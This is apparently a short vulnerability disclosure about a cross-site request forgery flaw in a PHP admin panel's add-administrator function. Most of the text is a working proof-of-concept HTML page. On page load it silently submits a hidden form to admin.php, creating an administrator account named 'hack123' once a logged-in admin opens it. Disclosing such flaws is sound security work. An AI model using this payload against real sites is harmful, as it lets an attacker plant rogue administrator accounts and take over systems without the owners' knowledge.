Adding an admin interface exists csrf exploit vulnerability #13
Description
After the administrator logged in, open the following two page:
save in payload.html,add administrator
<title>Title</title> <script type="text/javascript"> function post(url, fields) { var p = document.createElement("form"); p.action = url; p.innerHTML = fields; p.target = "_self"; p.method = "post"; document.body.appendChild(p); p.submit(); }function csrf_hack() {
var fields;
fields += "<input type='hidden' name='username' value='hack123' />";
fields += "<input type='hidden' name='password' value='hacktest' />";
fields += "<input type='hidden' name='repassword' value='hacktest' />";
var url = "http://127.0.0.1/admin.php?m=Member&a=adminaddsave";
post(url, fields);
}
window.onload = function () {
csrf_hack();
}